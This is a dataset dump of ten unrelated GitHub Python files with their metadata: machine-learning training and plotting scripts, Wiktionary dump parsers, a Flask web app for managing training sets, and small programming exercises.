4, figsize=(16, 12))\n\nfor i, image_id in enumerate(image_ids):\n img = imread(f'../input/train/{image_id}')\n mask_shape = img.shape[:-1]\n mask = np.zeros(mask_shape)\n \n encoded_pixels_list = segmentations[segmentations.ImageId == image_id].EncodedPixels.tolist()\n for encoded_pixels in encoded_pixels_list:\n mask += rle_decode(encoded_pixels, mask_shape)\n \n row = i // 2\n col = i * 2 % 4\n axes[row][col].axis('off')\n axes[row][col+1].axis('off')\n axes[row][col].imshow(img)\n axes[row][col+1].imshow(mask)\n \nplt.tight_layout(h_pad=0, w_pad=0)\nplt.show()\nimage_ids = segmentations[segmentations.EncodedPixels.isna()].sample(8, random_state=123).ImageId\nimage_ids\nfig, axes = plt.subplots(2, 4, figsize=(16, 8))\n\nfor i, image_id in enumerate(image_ids):\n img = imread(f'../input/train/{image_id}')\n \n row = i // 4\n col = i % 4\n \n axes[row][col].axis('off')\n 
axes[row][col].imshow(img)\n \nplt.tight_layout(h_pad=0, w_pad=0)\nplt.show()\n","repo_name":"aorursy/new-nb-7","sub_path":"shin2ro_airbus-ship-detection-eda.py","file_name":"shin2ro_airbus-ship-detection-eda.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36399540633","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.preprocessing import LabelEncoder\n\nplt.style.use('ggplot')\n\ndef plot_datapoints(data, dim_x, dim_y, classes=None, save_folder=None, name=None):\n \"\"\"\n Displays a scatter plot of the data given in argument.\n data: the data to be plotted. Datapoints should be given as rows and features\n as columns.\n dim_x: the column number (feature number) to be used as x-axis.\n dim_y: the column number (feature number) to be used as y-axis.\n classes: is an array which size equals the number of rows of 'data' and which\n associate each datapoint to its corresponding class.\n \"\"\"\n n_datapoints, n_features = data.shape\n\n fig = plt.figure(figsize=(15,15))\n color_classes = LabelEncoder().fit_transform(classes)\n plt.scatter(data[:,dim_x], data[:,dim_y], c=color_classes, s=40., alpha=0.65,\n linewidths=1.5, marker='D')\n\n plt.grid(True)\n plt.xlabel('Dimension %s' % dim_x)\n plt.ylabel('Dimension %s' % dim_y)\n\n if save_folder is None or name is None:\n plt.show()\n else:\n assert save_folder is not None and name is not None, 'Whether plot folder or' \\\n 'filename is missing.'\n path = os.path.join(os.getcwd(), save_folder)\n if not os.path.exists(path):\n os.makedirs(path)\n file_path = os.path.join(path, '%s.png' % name)\n plt.savefig(file_path)\n\n\ndef plot_error_rate(errors, legend):\n dim_subspace_max, n_methods = errors.shape\n\n fig = plt.figure(figsize=(10,10))\n x_range = range(1, dim_subspace_max+1)\n for method in range(n_methods):\n plt.plot(x_range, errors[:,method], label=legend[method], linewidth=3, alpha=0.8)\n\n plt.xlim([0, dim_subspace_max+1])\n plt.ylim([0,1])\n\n plt.xlabel('Number of dimensions used by KNN')\n plt.ylabel('Error rate')\n plt.legend(loc='best')\n\n plt.savefig('./perf_results/result.png')\n plt.show()\n","repo_name":"RomainSabathe/cw_dimension_reduction","sub_path":"plot_toolbox.py","file_name":"plot_toolbox.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4243589910","text":"from typing import List, Tuple\n\nimport numpy as np\n\n\ndef convert_x_list_to_array(x_list: List) -> np.ndarray:\n \"\"\"\n Converts list representation of features to array representation\n :param x_list: A list of (n_points x n_dims) numpy arrays ordered from lowest to highest fidelity\n :return: An array of all features with the zero-based fidelity index appended as the last column\n \"\"\"\n # First check everything is a 2d array\n if not np.all([x.ndim == 2 for x in x_list]):\n raise ValueError(\"All x arrays must have 2 dimensions\")\n\n x_array = np.concatenate(x_list, axis=0)\n indices = []\n for i, x in enumerate(x_list):\n indices.append(i * np.ones((len(x), 1)))\n\n x_with_index = np.concatenate((x_array, np.concatenate(indices)), axis=1)\n return x_with_index\n\n\ndef convert_y_list_to_array(y_list: List) -> np.ndarray:\n \"\"\"\n Converts list representation of outputs to array representation\n :param y_list: A list of (n_points x n_outputs) numpy arrays representing the outputs\n ordered from lowest to 
highest fidelity\n :return: An array of all outputs\n \"\"\"\n if not np.all([y.ndim == 2 for y in y_list]):\n raise ValueError(\"All y arrays must have 2 dimensions\")\n return np.concatenate(y_list, axis=0)\n\n\ndef convert_xy_lists_to_arrays(x_list: List, y_list: List) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Converts list representation of targets to array representation\n :param x_list: A list of (n_points x n_dims) numpy arrays ordered from lowest to highest fidelity\n :param y_list: A list of (n_points x n_outputs) numpy arrays representing the outputs\n ordered from lowest to highest fidelity\n :return: Tuple of (x_array, y_array) where\n x_array contains all inputs across all fidelities with the fidelity index appended as the last column\n and y_array contains all outputs across all fidelities.\n \"\"\"\n\n if len(x_list) != len(y_list):\n raise ValueError(\"Different number of fidelities between x and y\")\n\n # Check same number of points in each fidelity\n n_points_x = np.array([x.shape[0] for x in x_list])\n n_points_y = np.array([y.shape[0] for y in y_list])\n if not np.all(n_points_x == n_points_y):\n raise ValueError(\"Different number of points in x and y at the same fidelity\")\n\n return convert_x_list_to_array(x_list), convert_y_list_to_array(y_list)\n","repo_name":"EmuKit/emukit","sub_path":"emukit/multi_fidelity/convert_lists_to_array.py","file_name":"convert_lists_to_array.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":544,"dataset":"github-code","pt":"73"} +{"seq_id":"74602141995","text":"from algos.agent import Agent\nfrom algos.ppo import PPOAgent\nfrom algos.sac import SACAgent\nfrom algos.mf_trainer import Trainer\nfrom scripts.arguments import *\nfrom envs.babyai.utils.obs_preprocessor import make_obs_preprocessor\nfrom scripts.test_generalization import make_log_fn\nfrom algos.data_collector import DataCollector\nfrom utils.rollout import rollout\n\nimport shutil\nfrom logger import logger\nfrom utils.utils import set_seed\nfrom envs.babyai.levels.iclr19_levels import *\nfrom envs.babyai.levels.envdist import EnvDist\nimport pathlib\nimport joblib\nimport os\n\nfrom train_model import *\nfrom utils.agent_loader import *\n\n\ndef load_saved_agent(args):\n return args, load_agent_iteration(args.saved_iteration)\n\n\ndef run_distillation(args):\n args, saved_agent = load_saved_agent(args)\n original_args = saved_agent.args\n\n if not hasattr(args, 'noise'):\n args.noise = False\n exp_name = args.prefix\n set_seed(args.seed)\n feedback_list = get_feedback_list(args)\n env = make_env(args, feedback_list)\n args.feedback_list = feedback_list\n obs_preprocessor = make_obs_preprocessor(feedback_list)\n\n # Either we need an existing dataset, or we need to collect\n assert (args.buffer_path or (args.collect_policy is not None) or\n (args.rl_teacher is not None and args.collect_with_rl_policy) or\n (args.distill_teacher is not None and args.collect_with_distill_policy))\n # We can't collect with both policies\n assert not (args.collect_with_rl_policy and args.collect_with_distill_policy)\n\n\n log_policy = None\n if args.rl_teacher is not None:\n rl_agent = create_agent(args.rl_policy, args.rl_teacher, env, args,\n obs_preprocessor)\n log_policy = rl_agent\n else:\n rl_agent = None\n if args.distill_teacher is not None:\n distilling_agent = create_agent(args.distill_policy, args.distill_teacher, env, args, obs_preprocessor)\n log_policy = distilling_agent\n else:\n distilling_agent = None\n if 
args.relabel_teacher is not None:\n relabel_policy = create_agent(args.relabel_policy, args.relabel_teacher, env, args, obs_preprocessor)\n else:\n relabel_policy = None\n\n if args.collect_with_rl_policy:\n collect_policy = rl_agent\n args.collect_teacher = args.rl_teacher\n elif args.collect_with_distill_policy:\n collect_policy = distilling_agent\n args.collect_teacher = args.distill_teacher\n elif args.collect_teacher is not None:\n collect_policy = create_agent(args.collect_policy, args.collect_teacher, env, args, obs_preprocessor)\n if log_policy is None:\n log_policy = collect_policy\n else:\n collect_policy = None\n\n exp_dir = os.getcwd() + '/logs/' + exp_name\n args.exp_dir = exp_dir\n is_debug = args.prefix == 'DEBUG'\n configure_logger(args, exp_dir, args.start_itr, is_debug)\n\n if args.eval_envs is not None:\n eval_policy(log_policy, env, args, exp_dir)\n return\n\n envs = [env.copy() for _ in range(args.num_envs)]\n for i, new_env in enumerate(envs):\n new_env.seed(i+100)\n new_env.set_task()\n new_env.reset()\n if collect_policy is None:\n sampler = None\n else:\n sampler = DataCollector(collect_policy, envs, args)\n\n buffer_name = exp_dir if args.buffer_path is None else args.buffer_path\n args.buffer_name = buffer_name\n num_rollouts = 1 if is_debug else args.num_rollouts\n log_fn = make_log_fn(env, args, 0, exp_dir, log_policy, hide_instrs=args.hide_instrs, seed=args.seed+1000,\n stochastic=True, num_rollouts=num_rollouts, policy_name=exp_name,\n env_name=str(args.level),\n log_every=args.log_interval)\n\n trainer = Trainer(\n args=args,\n collect_policy=collect_policy,\n rl_policy=rl_agent,\n distill_policy=distilling_agent,\n relabel_policy=relabel_policy,\n sampler=sampler,\n env=deepcopy(env),\n obs_preprocessor=obs_preprocessor,\n log_dict=log_dict,\n log_fn=log_fn,\n )\n trainer.train()\n\n\nif __name__ == '__main__':\n parser = DistillArgumentParser()\n args = parser.parse_args()\n run_distillation(args)\n\n","repo_name":"Safe-RL-Team/advice-distillation-code","sub_path":"scripts/distill_model.py","file_name":"distill_model.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35320500780","text":"#!/usr/bin/python3\n\"\"\"Take Github credentials and return user id\"\"\"\nif __name__ == \"__main__\":\n import requests\n import sys\n username = sys.argv[1]\n pwd = sys.argv[2]\n response = \\\n requests.get('https://api.github.com/user', auth=(username, pwd))\n data = response.json()\n print(data.get('id'))\n","repo_name":"Semhal22/alx-higher_level_programming","sub_path":"0x11-python-network_1/10-my_github.py","file_name":"10-my_github.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18656026177","text":"from src.Regex import Regex\nfrom src.constants.regular_expressions import *\n\n\ndef language_code_of_dump_file(string):\n _language_code = Regex.findall(FIND_LANGUAGE_CODE_FOR_DUMP_REGEX, string)\n if len(_language_code) == 0:\n raise Exception(\"Could not find the language code for the wiktionary dump.\")\n elif len(_language_code) > 1:\n raise Exception(\"Found more than one language code even though only one was expected.\")\n return _language_code[0]\n\n\ndef dump_file_created_at(string):\n _created_at_string = Regex.findall(FIND_DATE_FROM_DUMP_FILE_NAME_REGEX, string)\n if len(_created_at_string) == 0:\n raise Exception(\"Could not find the timestamp in 
the filename.\")\n elif len(_created_at_string) > 1:\n raise Exception(\"Found more than one match where only one was expected.\")\n from datetime import datetime\n return datetime.strptime(_created_at_string[0], '%Y%m%d')\n\n\ndef pages(string):\n _pages = Regex.findall(FIND_ALL_PAGES_REGEX, string)\n if len(_pages) == 0:\n raise Exception(\"Could not find any pages.\")\n return _pages\n\n\ndef page(string):\n _match = Regex.search(FIND_ALL_PAGES_REGEX, string)\n _page = string[_match.regs[0][0] : _match.regs[0][1]]\n if len(_page) == 0:\n raise Exception(\"Could not find any page.\")\n return _page, _match.regs[0][0], _match.regs[0][1]\n\n\ndef namespace(string):\n _namespace = Regex.findall(FIND_NAMESPACE_REGEX, string)\n if len(_namespace) == 0:\n raise Exception(\"Could not find the namespace.\")\n elif len(_namespace) > 1:\n raise Exception(\"Found more than one namespace where only one was expected.\")\n return int(_namespace[0])\n\n\ndef page_title(string):\n _page_title = Regex.findall(FIND_PAGE_TITLE_REGEX, string)\n if len(_page_title) == 0:\n raise Exception(\"Could not find the page title.\")\n elif len(_page_title) > 1:\n raise Exception(\"Found more than one page title where only one was expected.\")\n return _page_title[0]\n\n\ndef page_id(string):\n _id = Regex.findall(FIND_PAGE_ID_REGEX, string)\n if len(_id) == 0:\n raise Exception(\"Could not find the page id.\")\n elif len(_id) > 1:\n raise Exception(\"Found more than one page id where only one was expected.\")\n return _id[0]\n\n\ndef page_redirect(string):\n _redirect = Regex.findall(FIND_PAGE_REDIRECT_REGEX, string)\n # Doesn't throw an exception if page has no redirect, few have them\n if len(_redirect) > 1:\n raise Exception(\"Found more than one page redirect where only one was expected.\")\n return _redirect[0] if len(_redirect) == 1 else None\n\n\ndef page_content(string):\n _content = Regex.findall(FIND_PAGE_CONTENT_REGEX, string)\n # Doesn't throw an exception if page has no content, some don't have a text tag\n if len(_content) > 1:\n raise Exception(\"Found more than one page content where only one was expected.\")\n return _content[0] if len(_content) == 1 else None\n\n\ndef page_language_sections(string):\n # Don't throw exception if nothing was found, some pages don't have sections -> it's rare tho\n return Regex.findall(FIND_ALL_PAGE_LANGUAGE_SECTIONS, string)\n\n\ndef part_of_speech_sections(regex, string):\n # Don't throw exception if nothing was found\n return Regex.findall(regex, string)\n","repo_name":"Goga-Barabadze/dictionary-parser-api","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"465847979","text":"try:\n arquivo = input(\"Informe o nome do arquivo: \")\n fhand = open(arquivo)\n for line in fhand:\n linha = str(line).strip()\n print(linha.upper())\n print(\"Arquivo lido com sucesso\")\nexcept FileNotFoundError:\n print(\"o arquivo não foi localizado, verifique o caminho informado\")\n\n\n","repo_name":"robsonpiere/ds-puc-ile-lista-python","sub_path":"Ex_7.1.py","file_name":"Ex_7.1.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"41308155637","text":"\"\"\"\n Exp7_2_DriveDistance -- RoseBot Experiment 7.2\n\n In an earlier experiment, we used a combination of speed and time to\n drive a certain distance. 
Using the encoders, we can me much more accurate.\n In this example, we will show you how to setup your robot to drive a certain\n distance regardless of the motor speed.\n\"\"\"\nimport rosebot.rosebot as rb\ndef main():\n board = rb.RoseBotConnection(ip_address='r03.wlan.rose-hulman.edu') # change the 'rXX' value\n motors = rb.RoseBotMotors(board)\n encoders = rb.RoseBotEncoder(board)\n button = rb.RoseBotDigitalInput(board, rb.RoseBotPhysicalConstants.PIN_BUTTON)\n while True:\n # wait for a button press to start driving.\n if button.read() == 0:\n motors.drive_distance(12, 150) # drive 12 inches at motor_power = 150\n\nmain()\n\n","repo_name":"Rosebotics/pymata-aio-examples","sub_path":"RoseBot/sparkfun_experiments/Exp7_2_DriveDistance.py","file_name":"Exp7_2_DriveDistance.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"17970186392","text":"# coding: utf-8\r\n# 主管通讯,即url调度\r\nfrom flask import Flask\r\nfrom flask import render_template, request, jsonify\r\nimport json\r\nimport os\r\nimport _thread\r\nimport time\r\n\r\nfrom user import User #user.py的内容\r\n\r\nfrom gevent.pywsgi import WSGIServer\r\nfrom geventwebsocket.handler import WebSocketHandler\r\n\r\n###########################################\r\n#copy于v0.3修改2版的main.py的前30行不重复内容\r\nfrom subfunction.change_file import alter_file, read_class_file\r\nfrom subfunction.set_ratio import training_set, writer_objfile\r\n\r\nif os.path.exists(\"user.log\"):#判断此文件是否存在 ,存在删除\r\n os.remove(\"user.log\")\r\nfp = open(\"user.log\",\"w\")\r\nfp.close()\r\n###########################################\r\n\r\n\r\nPATH=\"C:/Users/mail/Desktop/Xflask_demo/v1.0/test/\" \r\n\r\n\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['JSON_AS_ASCII'] = False\r\n\r\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n\r\n@app.route('/')\r\ndef index(): \r\n '''\r\n 可以理解为登录。\r\n '''\r\n loginuser=User('test_user')\r\n return render_template('index.html',login_user=\"test_user\",user_room=round(loginuser.haveGb(),3))\r\n\r\ndef readLastLine(filepath): #已更新为0.3修改2版代码\r\n with open(filepath, 'r') as fp:\r\n lines = fp.readlines()\r\n if lines: \r\n last_line = lines[-1]\r\n else:\r\n last_line ='\\n'\r\n return last_line\r\n\r\n@app.route('/via',methods=['GET', 'POST'])#0.5新增内容\r\ndef go2via():\r\n if request.method == \"GET\":\r\n print(request.args.get(\"userId\"),request.args.get(\"trainSetId\"))\r\n return render_template('via.html',login_user=\"test_user\",train_set=request.args.get(\"trainSetId\"))\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n return jsonify({'code':200,'status':1,'IMAGES':thisUser.getTrainSet(request.form.get('trainid'))})\r\n\r\nISRUN=False \r\n\r\ndef to_thread(cmd):\r\n global ISRUN\r\n ok=os.system(PATH+cmd+\" >> user.log \")\r\n #print(PATH+cmd+\" >> user.log \")\r\n ISRUN=False\r\n return\r\n\r\n@app.route('/logicMe/',methods = [\"GET\",\"POST\"])#测试需要,没有加入0.3修改版内容\r\ndef logic(): \r\n global ISRUN \r\n if request.method == \"POST\":\r\n cmd = request.form.get('cmd')#type=str, default=None)\r\n #ip = request.remote_addr\r\n if cmd :\r\n if ISRUN: \r\n last_line=readLastLine('user.log')\r\n time.sleep(0.5) #由后端控制轮询速度\r\n return jsonify({'code':200,'status':1,'msg':last_line})\r\n elif int(request.form.get('isFirst'))==1: \r\n ISRUN=True \r\n _thread.start_new_thread(to_thread, ('print',)) \r\n last_line=\"0.5版该语句无效\\n\"\r\n return jsonify({'code':200,'status':1,'msg':last_line}) \r\n 
else:\r\n last_line=readLastLine('user.log') \r\n return jsonify({'code':200,'status':1,'msg':last_line,'end':1}) \r\n\r\n ##json.dumps(dic,ensure_ascii=False) #个人笔记:这种方式需要前端使用JSON.parse,django常用这种\r\n ##return jsonify({'code':200,'status':1,'msg':last_line})\r\n else:\r\n return jsonify({'code':400,'message':'Error'})\r\n\r\n@app.route('/addObject/',methods = [\"GET\",\"POST\"])#0.5版新增内容\r\ndef addObject(): #且包含增加训练集的交互\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n if request.form.get('what')=='object':\r\n if thisUser.add_obj(request.form):\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"}) \r\n elif request.form.get('what')=='trains':\r\n #if thisUser.add_obj(request.form):\r\n upload_files=request.files.getlist('FILE')\r\n #print(\"------>\",upload_files)\r\n if thisUser.add_trainImg(request.form,upload_files):\r\n print(request.form)\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"}) \r\n\r\n@app.route('/TrainSetLabelsAdd/',methods = [\"GET\",\"POST\"])#0.5版新增内容\r\ndef userTrainSetLabel():\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n if thisUser.leabels('add',request.form.get('trainid'),json.loads(request.form.get('labels'))):\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"})\r\n \r\n@app.route('/loadUser/',methods = [\"GET\",\"POST\"])#0.5版新增内容\r\ndef loadUser():\r\n #读出用户的文件菜单\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n reqList=thisUser.getUserlis(request.form.get('what'))\r\n return jsonify({'code':200,'status':1,'msg':reqList,'serverFiles':len(os.listdir('./static/public_train/images/'))}) \r\n\r\n@app.route('/deletit/',methods = [\"GET\",\"POST\"])\r\ndef deletit():\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n if request.form.get('what')=='trains':\r\n if thisUser.delet_trains(request.form.get('thisis')):\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"})\r\n\r\n\r\n@app.route('/ws')#websocket试验,参考https://www.cnblogs.com/yb635238477/p/9795097.html\r\ndef ws():\r\n print(request.environ.get('wsgi.websocket'))\r\n print(request.environ)\r\n user_socket = request.environ.get('wsgi.websocket') # type: WebSocket\r\n if user_socket: \r\n while 1:\r\n msg = user_socket.receive() # 接受消息\r\n print(msg)\r\n user_socket.send(msg) # 发送消息\r\n\r\n\r\n@app.route('/go03')#进入0.3修改版\r\ndef index03():\r\n return render_template('index03.html')\r\n@app.route('/logicMake/',methods = [\"GET\",\"POST\"])#0.3修改版内容完全copy,由于路径问题无法测试\r\ndef logicMake(): \r\n if request.method == \"POST\":\r\n print(\"用户创建\"+request.form.get('mdList1')+\" +cfg:\"+request.form.get('mdList2'))\r\n print(request.form.get('class_names'))\r\n names = request.form.get('class_names')\r\n class_names_path=r\"D:\\test_yolov4\\classes.names\"\r\n if os.path.exists(class_names_path):#判断此文件是否存在 ,存在删除\r\n os.remove(class_names_path) \r\n with open(class_names_path, \"a+\", encoding=\"utf-8\") as f2:\r\n f2.write(names)\r\n \r\n class_num = read_class_file(class_names_path)\r\n print(\"class_num:\",class_num)\r\n print(type(class_num))\r\n percent = request.form.get('ratio')\r\n print(\"---\",percent)\r\n # class_names_path train_path val_path obj.data 放在先前设置的文件夹中 同一个文件夹中 文件夹必须用英文命名\r\n # weight_save 设置存放的文件夹\r\n class_names_path=r\"D:\\test_yolov4\\classes.names\" #放着类别名称的文件\r\n weight_save=r\"D:\\test_yolov4\\yolov4_train\" #选择存放训练完成后权重的文件夹\r\n train_path = r\"D:\\test_yolov4\\train.txt\" #放着训练的图片路径的txt文件\r\n val_path = r\"D:\\test_yolov4\\val.txt\" 
# #放着验证的图片路径的txt文件\r\n obj_data_path = r\"D:\\test_yolov4\\obj.data\" #放训练综合文件的文件\r\n #前端选择标注完成训练的文件夹\r\n train_floder = [r\"E:\\yolov3_train2_pig20201216\\images\"]#数据集文件夹列表 选择\r\n \r\n if percent ==\"0\": \r\n training_set(percent,train_floder,train_path)\r\n writer_objfile(percent,class_num,class_names_path,train_path,weight_save,obj_data_path)\r\n print(\"^^^\",val_path)\r\n training_set(percent,train_floder,train_path,val_path=val_path)\r\n \r\n writer_objfile(percent,class_num,class_names_path,train_path,weight_save,obj_data_path,val_path=val_path)\r\n #此处添加的YOLO调整参数,其他模型需要跳转\r\n if request.form.get('mdList1') == \"yolov4\":\r\n cfg_parame = {} \r\n cfg_parame[\"batch\"] = request.form.get('batch')+\"\\n\"\r\n # print(\"batch\",request.form.get('batch'))\r\n cfg_parame[\"subdivisions\"] = request.form.get('subdivisions')+\"\\n\"\r\n cfg_parame[\"width\"] = request.form.get('width')+\"\\n\"\r\n cfg_parame[\"height\"] = request.form.get('height')+\"\\n\"\r\n # print(\"angle\",request.form.get('angle'))\r\n cfg_parame[\"angle\"] = request.form.get('angle')+\"\\n\"\r\n\r\n cfg_parame[\"learning_rate\"] = request.form.get('learning_rate')+\"\\n\"\r\n cfg_parame[\"max_batches\"] = request.form.get('max_batches')+\"\\n\"\r\n cfg_parame[\"steps\"] = request.form.get('steps')+\"\\n\"\r\n cfg_parame[\"scales\"] = request.form.get('scales')+\"\\n\"\r\n\r\n cfg_parame[\"classes\"] = str(class_num)+\"\\n\" #得到类别的数量\r\n cfg_parame[\"filters\"] = str((int(class_num)+5)*3)+\"\\n\" #计算最后一层filters数量 (类别数+5)*3\r\n print(cfg_parame[\"filters\"])\r\n \r\n\r\n if request.form.get('mdList2') ==\"yolov4-tiny.cfg\":\r\n old_cfg_name = \"yolov4-tiny.cfg\" #存放tiny.cfg原地址\r\n new_cfg_name = os.path.join(r\"D:\\test_yolov4\",time.strftime(\"%d_%m_%Y_\")+\"user_yolov4-tiny.cfg\")#新地址新名字\r\n alter_file(old_cfg_name,new_cfg_name,**cfg_parame) #调用生成文件函数\r\n\r\n elif request.form.get('mdList2') ==\"yolov4.cfg\":\r\n old_cfg_name = \"yolov4.cfg\" #存放cfg原地址\r\n new_cfg_name = os.path.join(r\"D:\\test_yolov4\",time.strftime(\"%d_%m_%Y_\")+\"user_yolov4-tiny.cfg\") #新地址新名字 \r\n #......\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"}) \r\n\r\nif __name__ == '__main__':\r\n #app.run(host='0.0.0.0', port=8910, debug=True)\r\n http_serv = WSGIServer(('0.0.0.0',8910),app,handler_class=WebSocketHandler)\r\n http_serv.serve_forever()\r\n","repo_name":"yourkg/--","sub_path":"demo_02/v1.0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2253455280","text":"# Ejercicio 4: Asume que ejecutamos las siguientes sentencias de asignación:\n# ancho = 17\n# alto = 12.0\n# Para cada una de las expresiones siguientes, \n# escribe el valor de la expresión y el tipo (del valor de la expresión).\n#1. ancho/2\n#2. ancho/2.0\n#3. alto/3\n#4. 
1 + 2 * 5\n\nancho = 17\nalto = 12.0\n\na = ancho/2\nb = ancho/2.0\nc = alto/3\nd = 1 + 2 * 5\n\nprint('ancho/2 = ',a,type(a))\nprint('ancho/2.0 = ',b,type(b))\nprint('alto/3 = ',c,type(c))\nprint('1 + 2 * 5 = ',d,type(d))\n","repo_name":"josereyg21/python-para-todos","sub_path":"Cap 2/2-4.py","file_name":"2-4.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5852901319","text":"import tcod as tcod\n\n\nSCREEN_WIDTH = 80\nSCREEN_HEIGHT = 50\nLIMIT_FPS = 20\n\nfont_path = 'dejavu16x16_gs_tc.png'\nfont_flag = tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD\ntcod.console_set_custom_font(font_path, font_flag)\n\nwindow_title = 'LASM'\nfullscreen = False\nroot_console = tcod.console_init_root(SCREEN_WIDTH, SCREEN_HEIGHT, window_title, fullscreen)\ntcod.sys_set_fps(LIMIT_FPS)\n\nwhile not tcod.console_is_window_closed():\n tcod.console_set_default_foreground(0, tcod.white)\n # tcod.console_put_char(0, 1, 1, '@', tcod.BKGND_NONE)\n root_console.print_(10, 5, \"Player\")\n\n tcod.console_flush()\n\n\n","repo_name":"CriminalBacon/genomPy","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73348139757","text":"__all__ = ('ilogging', )\r\n\r\nfrom pathlib import Path\r\nfrom datetime import datetime\r\nfrom utils.envs import res_dir\r\nfrom logging import basicConfig, DEBUG, getLogger\r\n \r\n__logger__ = None\r\n\r\n\r\ndef __setup__():\r\n global __logger__\r\n\r\n logs_path = Path(res_dir()) / 'Logs'\r\n if not logs_path.exists():\r\n try:\r\n logs_path.mkdir(parents=True)\r\n except:\r\n pass\r\n\r\n logfile_name = logs_path.joinpath(datetime.now().strftime('%B-%Y') + '.log')\r\n basicConfig(filename=logfile_name,\r\n format='%(asctime)s :: %(levelname)s :: %(name)s :: %(message)s')\r\n __logger__ = getLogger('SYAI-M3Play')\r\n __logger__.setLevel(DEBUG)\r\n\r\n\r\ndef ilogging(message, level: str = 'e'):\r\n if level == 'i':\r\n __logger__.info(repr(message))\r\n elif level == 'e':\r\n __logger__.error(repr(message))\r\n elif level == 'd':\r\n __logger__.debug(repr(message))\r\n elif level == 'c':\r\n __logger__.critical(repr(message))\r\n else:\r\n __logger__.warning(repr(message))\r\n\r\n\r\n__setup__()\r\n","repo_name":"sntakirutimana72/M3Play","sub_path":"utils/loggers/ilogger.py","file_name":"ilogger.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70375332075","text":"#!/usr/bin/env python\n\nimport cPickle\n\nimport numpy as np\nimport tensorflow as tf\n\nimport model\n\n\ndef unpickle(file):\n fo = open(file, 'rb')\n dict = cPickle.load(fo)\n fo.close()\n return dict\n\n\ndef one_hot_vec(label):\n vec = np.zeros(10)\n vec[label] = 1\n return vec\n\n\ndef load_data():\n x_all = []\n y_all = []\n for i in range(5):\n d = unpickle(\"cifar-10-batches-py/data_batch_\" + str(i + 1))\n x_ = d['data']\n y_ = d['labels']\n x_all.append(x_)\n y_all.append(y_)\n\n d = unpickle('cifar-10-batches-py/test_batch')\n x_all.append(d['data'])\n y_all.append(d['labels'])\n\n x = np.concatenate(x_all) / np.float32(255)\n y = np.concatenate(y_all)\n x = np.dstack((x[:, :1024], x[:, 1024:2048], x[:, 2048:]))\n x = x.reshape((x.shape[0], 32, 32, 3))\n\n pixel_mean = np.mean(x[0:50000], axis=0)\n x -= pixel_mean\n\n y = map(one_hot_vec, y)\n X_train = 
x[0:50000, :, :, :]\n Y_train = y[0:50000]\n X_test = x[50000:, :, :, :]\n Y_test = y[50000:]\n\n return (X_train, Y_train, X_test, Y_test)\n\n\ndef main():\n # Define hyper-parameter\n learning_rate = 0.01\n batch_size = 12\n epoch_number = 1\n steps_to_validate = 12\n resnet_layer_number = 32 # 20\n\n # Load training dataset\n X_train, Y_train, X_test, Y_test = load_data()\n\n # Define the model\n X = tf.placeholder(\"float\", [None, 32, 32, 3])\n Y = tf.placeholder(\"float\", [None, 10])\n net = model.resnet(X, resnet_layer_number)\n cross_entropy = -tf.reduce_sum(Y * tf.log(net))\n opt = tf.train.MomentumOptimizer(learning_rate, 0.9)\n train_op = opt.minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(net, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n # Define other tools\n saver = tf.train.Saver()\n checkpoint = tf.train.latest_checkpoint(\"./checkpoint/\")\n init_op = tf.initialize_all_variables()\n\n # Start the session\n with tf.Session() as sess:\n sess.run(init_op)\n\n # Restore from checkpoint\n if checkpoint:\n print(\"Restore checkpoint from: {}\".format(checkpoint))\n #saver.restore(sess, checkpoint)\n\n # Start training\n for epoch_index in range(epoch_number):\n for i in range(0, 50000, batch_size):\n feed_dict = {\n X: X_train[i:i + batch_size],\n Y: Y_train[i:i + batch_size]\n }\n sess.run([train_op], feed_dict=feed_dict)\n\n if i % steps_to_validate == 0:\n saver.save(sess, './checkpoint/', global_step=i)\n\n 